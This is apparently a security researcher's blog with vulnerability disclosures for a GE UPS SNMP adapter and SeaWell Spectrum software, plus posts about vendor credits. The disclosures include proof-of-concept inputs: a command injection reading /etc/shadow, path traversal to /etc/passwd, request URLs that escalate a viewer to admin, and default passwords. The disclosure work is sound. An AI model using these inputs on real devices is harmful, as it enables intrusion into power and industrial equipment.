Friday, January 29, 2016

[ICS] GEDE UPS SNMP Adapter Vulnerabilities

[ICS] GE Industrial Solutions - UPS SNMP Adapter Command Injection and Clear-text Storage of Sensitive Information Vulnerabilities

Reported to ICS-CERT: July 06, 2015
Fix & Advisory Released by GE: January 25, 2016 --- Yeah, 7 months to fix 2 issues in a product deployed in Critical Manufacturing & Energy sector - go figure! GE's customers should get concerned.


Vulnerability ID: GEIS16-01

GE Advisory: http://apps.geindustrial.com/publibrary/checkout/GEIS_SNMP?TNR=Application%20and%20Technical|GEIS_SNMP|PDF&filename=GEIS_SNMP.pdf

ICS-CERT Advisory:

In Progress

About GE
GE is a US-based company that maintains offices in several countries around the world.

The affected product, SNMP/Web Interface adapter, is a web server designed to present information about the Uninterruptible Power Supply (UPS). According to GE, the SNMP/Web Interface is deployed across several sectors including Critical Manufacturing and Energy. GE estimates that these products are used worldwide.

Affected Products
• All SNMP/Web Interface cards with firmware version prior to 4.8 manufactured by GE Industrial Solutions.

CVE-IDs:
CVE-2016-0861
CVE-2016-0862

VULNERABILITY OVERVIEW

A
COMMAND INJECTION
CVE-2016-0861

Device management application runs as root privileged user, and does not perform strict input validation. This allows an authenticated user to execute any system commands on the system.

Vulnerable function:
http://IP/dig.asp

Vulnerable parameter:
Hostname/IP address

PoC:

In the Hostname/IP address input, enter:
; cat /etc/shadow

Output
root:<hash>:0:0:root:/root:/bin/sh
<...other system users...>
ge:<hash>:101:0:gedeups7:/home/admin:/bin/sh
root123:<hash>:102:0:gedeups2:/home/admin:/bin/sh

B
CLEARTEXT STORAGE OF SENSITIVE INFORMATION
CVE-2016-0862

File contains sensitive account information stored in cleartext. All users, including non-admins, can view/access device's configuration, via Menu option -> Save -> Settings. The application stores all information in clear-text, including all user login and clear-text passwords.

Additional issues:
As we see with Command Injection issue above, the underlying application services are running as privileged user, root, I believe. And that folks, is another example why it is important to run services as specific, non-root users, with specific permissions to do required tasks.

Another issue you see here, is the application uses default initial credentials - ge / ge - and does not have any mechanism to force password change on the first use - Big problem.


+++++

Friday, January 22, 2016

SeaWell Networks Spectrum - Multiple Vulnerabilities

# Exploit Title: [SeaWell Networks Spectrum - Multiple Vulnerabilities]
# Discovered by: Karn Ganeshen
# Versions Reported: [Spectrum SDC 02.05.00, Build 02.05.00.0016]
# Vendor Homepage: [http://www.seawellnetworks.com/spectrum/]


CVE-ID:
CVE-2015-8282
CVE-2015-8283

CVE-2015-8284

About SeaWell Networks Spectrum

Session Delivery Control

SeaWell set out to improve the way operators control, monetize and scale their IP video offerings, to meet the growing subscriber demands for video delivered to smartphones, tablets and game consoles. 

The result – Spectrum – is what we call a “Multiscreen 2.0” Session Delivery Controller. Spectrum is high-performance, carrier-grade software that takes ABR video and repackages it – on-the-fly – into any other protocol, including Apple HLS, Adobe HDS, Microsoft Smooth Streaming and MPEG-DASH.

http://www.seawellnetworks.com/spectrum/ 

Affected version
Spectrum SDC 02.05.00
Build 02.05.00.0016

Vulnerabilities

A. CWE-255: Credentials Management 
CVE-2015-8282 Weak, default login credentials - admin / admin

B. CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CVE-2015-8283

The configure_manage.php module accepts a file parameter which takes an unrestricted file path as input, allowing an attacker (non-admin, low- privileged user) to read arbitrary files on the system.


PoC:
https://IP/configure_manage.php?action=download_config&file=../../../../../../../../../etc/passwd

C. CWE-285: Improper Authorization
CVE-2015-8284

A. low privileged, non-admin user, with only viewer privileges, can perform administrative functions, such as create, update, delete a user (including admin user), or access device's configuration files (policy.xml, cookie_config.xml, systemCfg.xml). The application lacks Authorization controls to restrict any non-admin users from performing admin functions.

The application users can have admin or viewer privilege levels. Admin has full access to the device. Viewer has access to very restricted functions. It is possible for a viewer priv user to perform admin functions.

PoC: 
Add new user [Admin function only] 

GET /system_manage.php?username=viewer&password=viewer&password=viewer&userlevel=1&action=add_user&ekey=&LActiveRow= HTTP/1.1 

https://IP/system_manage.php?username=viewer1&password=viewer&password=viewer&userlevel=9&action=add_user&ekey=&LActiveRow= 

Create new user with Admin privs

Here 
admin -> userlevel=9 
viewer -> userlevel=1 

Log in as viewer - try create new admin user - viewer1 

https://IP/system_manage.php?username=viewer1&password=viewer&password=viewer&userlevel=9&action=add_user&ekey=&LActiveRow= 

<result><returnCode>0</returnCode><returnMsg>Success</returnMsg><loggedIn>1</loggedIn><payload/></result> 

Delete user 

https://IP/system_manage.php?username=viewer1&password=&password=&userlevel=9&action=delete_user&ekey=4&LActiveRow=sys_Luser_4

<result><returnCode>0</returnCode><returnMsg>Success</returnMsg><loggedIn>1</loggedIn><payload/></result>

Modify existing user (including admin) log in as viewer - try change system (admin) user 
https://IP/system_manage.php?username=system&password=&password=&userlevel=9&action=delete_user&ekey=4&LActiveRow=sys_Luser_4 

Change Admin password 
log in as viewer - try change admin pass 

https://IP/system_manage.php?username=admin&password=admin1&password=admin1&userlevel=9&action=update_user&ekey=3&LActiveRow=sys_Luser_3 

<result><returnCode>0</returnCode><returnMsg>Success</returnMsg><loggedIn>1</loggedIn><payload/></result> 


Downloading configuration xml files 

viewer priv user has no access/option to config xmls via GUI. It is possible to download the configs by calling the url directly

Access policy config xml 
https://IP/configure_manage.php?action=download_config&file=policy.xml 

Access cookie config xml 
https://IP/configure_manage.php?action=download_config&file=cookie_config.xml 

Access system config xml 
https://IP/configure_manage.php?action=download_config&file=systemCfg.xml 
+++++

Cheers!

Monday, January 4, 2016

Cambium ePMP 1000 - Security Researcher Credits received

Folks,

Cambium ePMP security point of contact (Alex Marcham) reached out today and informed release of new software version 2.6 that fixes all the vulnerabilities I reported.


Alex confirmed security researcher credits to me have been acknowledged & documented now:

Security Researcher Acknowledgments
Cambium Networks is pleased to recognize Karn Ganeshen who have helped make ePMP 1000 safer by finding and reporting security vulnerabilities and worked with us to remediate the issue.

I must mention Cambium's earlier point of contact (Dmitry Moiseev) had played down my reports and ceased all communication after collecting detailed report. That sucked. Later when I released exploitation details to Full Disclosure, Alex contacted me and worked on getting the issues fixed along with due credits.

It is good to know Cambium team has consultants like Alex, who do value & appreciate Responsible Disclosure done by security researchers.


+++++

Cheers!

HNY + ZTE WhiteHat Award

Happy New Year everyone.!

Back in November 2015, I published details of multiple vulnerabilities in ZTE modems & routers. 

http://ipositivesecurity.blogspot.in/2015/11/zte-adsl-modems-multiple-vulnerabilities.html
http://ipositivesecurity.blogspot.in/2015/11/zte-zxhn-h108n-r1a-routers-contain.html

ZTE PSIRT team acknowledged it here:
http://support.zte.com.cn/support//news/LoopholeInfoDetail.aspx?newsId=1006863

ZTE PSIRT team emailed to me recently that my reports have put me up for White Hat Awards 2014-2015. :)

ZTE PSIRT white hat awarding 2014-2015
Dear Karn,

Thanks for reporting vulnerability to ZTE PSIRT,we prepared a gift to express our gratitude to your contribution.


We need one your active email account for the awarding, you may tell us of it or we will take this account by default .Thank you!

Best Regards.
ZTE PSIRT



+++++
Cheers!

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.